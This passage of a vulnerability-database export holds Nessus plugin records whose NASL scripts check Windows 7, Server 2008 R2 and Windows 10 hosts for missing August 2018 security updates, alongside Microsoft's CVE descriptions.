attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)", "edition": 35, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "KB4343899: Windows 7 and Windows Server 2008 R2 August 2018 Security Update (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8342", "CVE-2018-8343", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8397", "CVE-2018-8316", "CVE-2018-8396", "CVE-2018-8373", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-3665", "CVE-2018-8346", "CVE-2018-8341", "CVE-2018-8385", "CVE-2018-8371", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS18_AUG_4343900.NASL", "href": "https://www.tenable.com/plugins/nessus/111689", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111689);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/12/18\");\n\n script_cve_id(\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-3665\",\n \"CVE-2018-8316\",\n \"CVE-2018-8339\",\n \"CVE-2018-8341\",\n \"CVE-2018-8342\",\n \"CVE-2018-8343\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8346\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8355\",\n \"CVE-2018-8360\",\n \"CVE-2018-8371\",\n \"CVE-2018-8372\",\n \"CVE-2018-8373\",\n \"CVE-2018-8385\",\n \"CVE-2018-8389\",\n \"CVE-2018-8394\",\n \"CVE-2018-8396\",\n \"CVE-2018-8397\",\n \"CVE-2018-8398\",\n \"CVE-2018-8403\",\n \"CVE-2018-8404\"\n );\n script_bugtraq_id(\n 104975,\n 104978,\n 104982,\n 104983,\n 104984,\n 104986,\n 104987,\n 104992,\n 104994,\n 104995,\n 104999,\n 105001,\n 105002,\n 105027,\n 105028,\n 105030\n );\n script_xref(name:\"MSKB\", value:\"4343899\");\n script_xref(name:\"MSKB\", value:\"4343900\");\n script_xref(name:\"MSFT\", value:\"MS18-4343899\");\n script_xref(name:\"MSFT\", value:\"MS18-4343900\");\n\n script_name(english:\"KB4343899: Windows 7 and Windows Server 2008 R2 August 2018 Security Update (Foreshadow)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4343899\nor cumulative update 4343900. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8342, CVE-2018-8343)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8396, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345,\n CVE-2018-8346)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8397)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\");\n # https://support.microsoft.com/en-us/help/4343899/windows-7-update-kb4343899\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3a469b20\");\n # https://support.microsoft.com/en-us/help/4343900/windows-7-update-kb4343900\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7990c33\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4343899 or Cumulative Update KB4343900\nas well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8346\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", 'microsoft_windows_env_vars.nasl');\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-08\";\nkbs = make_list('4343899', '4343900');\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"08_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4343899, 4343900])\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:12:51", "description": "The remote Windows host is missing security update 4343892.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8381)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8401, CVE-2018-8405,\n CVE-2018-8406)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)", "edition": 29, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "KB4343892: Windows 10 August 2018 Security Update (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "modified": "2018-08-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_AUG_4343892.NASL", "href": "https://www.tenable.com/plugins/nessus/111686", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111686);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-0952\",\n \"CVE-2018-8200\",\n \"CVE-2018-8204\",\n \"CVE-2018-8266\",\n \"CVE-2018-8316\",\n \"CVE-2018-8339\",\n \"CVE-2018-8341\",\n \"CVE-2018-8343\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8355\",\n \"CVE-2018-8357\",\n \"CVE-2018-8360\",\n \"CVE-2018-8370\",\n \"CVE-2018-8371\",\n \"CVE-2018-8372\",\n \"CVE-2018-8373\",\n \"CVE-2018-8381\",\n \"CVE-2018-8385\",\n \"CVE-2018-8389\",\n \"CVE-2018-8394\",\n \"CVE-2018-8398\",\n \"CVE-2018-8401\",\n \"CVE-2018-8403\",\n \"CVE-2018-8404\",\n \"CVE-2018-8405\",\n \"CVE-2018-8406\"\n );\n script_bugtraq_id(\n 104977,\n 104978,\n 104980,\n 104982,\n 104983,\n 104984,\n 104986,\n 104987,\n 104992,\n 104995,\n 104999,\n 105001,\n 105006,\n 105007,\n 105008,\n 105011,\n 105012,\n 105027,\n 105030,\n 105048\n );\n script_xref(name:\"MSKB\", value:\"4343892\");\n script_xref(name:\"MSFT\", value:\"MS18-4343892\");\n\n script_name(english:\"KB4343892: Windows 10 August 2018 Security Update (Foreshadow)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4343892.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8381)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8401, CVE-2018-8405,\n CVE-2018-8406)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\");\n # https://support.microsoft.com/en-us/help/4343892/windows-10-update-kb4343892\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e04d903e\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4343892 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8344\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", 'microsoft_windows_env_vars.nasl');\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-08\";\nkbs = make_list('4343892');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, 